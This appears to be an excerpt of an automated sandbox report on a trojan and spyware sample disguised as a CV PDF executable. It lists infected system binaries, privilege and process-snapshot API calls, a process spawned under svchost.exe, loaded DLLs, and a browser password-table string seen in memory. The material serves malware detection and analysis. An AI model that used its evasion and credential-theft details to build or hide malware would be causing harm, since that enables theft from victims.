            Source: tnameserv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: unpack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ie_to_edge_stub.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: cookie_exporter.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: FXSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: identity_helper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Locator.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: MsSense.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SensorDataService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: snmptrap.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Spectrum.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ssh-agent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: TieringEngineService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AgentService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: vds.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: VSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: setup.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedgewebview2.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: notification_click_helper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pwahelper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pwahelper.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVDllSurrogate.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wbengine.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: WmiApSrv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wmpnetwk.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SearchIndexer.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7z.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7zFM.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7zG.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVDllSurrogate32.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVDllSurrogate64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVLP.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: OneDriveSetup.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Integrator.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppSharingHookController.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Common.ShowHelp.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Acrobat.exe.1.drBinary string: \\.\ko.%x.%x.%xSoftware\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer320123456789abcdef\Device\HarddiskVolume
            Source: Acrobat.exe.1.drBinary string: sbox_alternate_desktop_local_winstation_\??\\\?\\??\pipe\\??\mailslot\\/?/?\\Device\
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@24/154@87/21
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Users\user\AppData\Roaming\5b796eff430b0ac5.bin
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-5b796eff430b0ac59ea72c54-b
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Users\user\AppData\Local\Temp\aut7973.tmp
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: mfpmp.exe, 00000019.00000002.2422170365.0000000003263000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1565865507.0000000003263000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1564372509.0000000003243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CV_Sales Representative - Job Request PDF.exeVirustotal: Detection: 80%
            Source: CV_Sales Representative - Job Request PDF.exeReversingLabs: Detection: 84%
            Source: unknownProcess created: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
            Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe"
            Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
            Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
            Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
            Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
            Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
            Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeProcess created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"
            Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
            Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
            Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
            Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
            Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
            Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
            Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: wsock32.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: winmm.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: mpr.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: wininet.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: winhttp.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: secur32.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: winnsi.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: webio.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mpr.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: webio.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
